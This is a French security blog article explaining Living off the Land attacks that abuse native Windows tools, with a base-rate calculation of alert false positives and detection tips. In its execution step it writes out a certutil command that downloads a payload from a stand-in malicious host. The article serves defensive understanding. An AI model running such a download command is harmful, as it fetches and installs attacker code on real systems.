Living off the Land : pourquoi ces attaques sont les plus difficiles à détecter

Introduction

Toutes les attaques ne reposent pas sur des malwares exotiques ou des binaires inconnus. Aujourd’hui, les attaquants les plus sophistiqués privilégient une approche plus discrète : utiliser les outils déjà présents sur le système cible. Cette technique est connue sous le nom de Living off the Land (LotL).

Ces attaques sont particulièrement dangereuses, car elles exploitent des outils légitimes comme PowerShell, WMI ou certutil, rendant la détection beaucoup plus complexe. Un antivirus traditionnel peut ne rien voir d’anormal, car aucun fichier malveillant n’est nécessaire.

Dans cet article, nous allons :

• Définir clairement ce qu’est une attaque Living off the Land,
• Expliquer pourquoi elle est si efficace,
• Détailler comment elle fonctionne étape par étape,
• Illustrer son impact avec un exemple chiffré,
• Proposer des pistes concrètes de détection.

Qu’est-ce qu’une attaque Living off the Land?Pourquoi est-ce critique ?

Une attaque Living off the Land consiste à utiliser des outils légitimes déjà présents sur le système pour exécuter des actions malveillantes comme:

• PowerShell
• WMI (Windows Management Instrumentation)
• Certutil
• Bitsadmin
• Task Scheduler

L’attaquant ne dépose pas forcément de malware. Il exploite ce qui existe déjà.

Pourquoi c’est critique :

• Aucun binaire inconnu à détecter
• Signature antivirus inefficace
• Activité ressemblant à de l’administration légitime
• Forte probabilité de faux positifs si mal interprété

' Le défi n’est plus “détecter un malware”, mais détecter une intention malveillante dans un comportement légitime’

1.   Comment fonctionne une attaque Living off the Land :

Étape 1 — Accès initial :

L’attaquant obtient un accès :

• Phishing
• Vol d’identifiants
• VPN compromis

Aucun malware sophistiqué nécessaire.

Étape 2 — Exécution via outil natif :

Exemple :

powershell -EncodedCommand ...

Ou :

certutil -urlcache -split -f http://malicious-site/payload.exe

Le binaire exécuté est légitime, le comportement ne l’est pas..

Étape 3 — Persistance :

Assure la continuité de l'attaque via :

• Scheduled Tasks
• WMI permanent event subscription
• Modification de registre Run key

Toujours sans déposer de malware distinct.

Étape 4 — Mouvement latéral :

Utilisation de :

• PsExec
• WMI
• RDP
• SMB

Toujours avec des outils d’administration standards.

Exemple chiffré : pourquoi la détection devient probabiliste

Imaginons :

• 10 000 exécutions PowerShell par jour
• 5 réellement malveillantes

Prévalence réelle : P(M)=5/10000=0.0005 , soit 0,05 %

Supposons un EDR avec :

• 90 % de détection
• 2 % de faux positifs

Calcul de la détection réelle : 0.9×5=4.5

Faux positifs : 0.02×9995=199.9

Total alertes ≈ 204

Probabilité qu’une alerte soit réelle : P(M∣A)=4.5/204≈2.2%

' 97,8 % des alertes sont fausses'

Voilà pourquoi le LotL est si difficile : la prévalence faible rend le bruit dominant.

Conseils pratiques pour détecter les attaques Living off the Land :

1- Activer les logs avancés (PowerShell, WMI, process creation)

2- Corréler événements entre eux (log stitching)

3- Surveiller :

• EncodedCommand
• Exécution depuis dossiers temporaires
• Parent-child process anomalies

4- Restreindre les privilèges administrateur

5- Mesurer le ratio : Signal/Bruit

La détection comportementale est essentielle.

Conclusion :

Les attaques Living off the Land représentent l’évolution naturelle de la cybercriminalité moderne : moins de malware, plus d’abus d’outils légitimes.

Elles exploitent :

• la complexité des environnements
• la faible prévalence réelle
• la fatigue des analystes
• les limites probabilistes de la détection

Détecter le LotL ne repose pas uniquement sur l’outil EDR, mais sur :

• la corrélation intelligente,
• la compréhension probabiliste,
• la réduction du bruit,
• la maturité opérationnelle.

Dans ce contexte, la question n’est plus “mon EDR détecte-t-il ?”, mais “mon environnement me permet-il de distinguer l’intention malveillante du comportement légitime ?”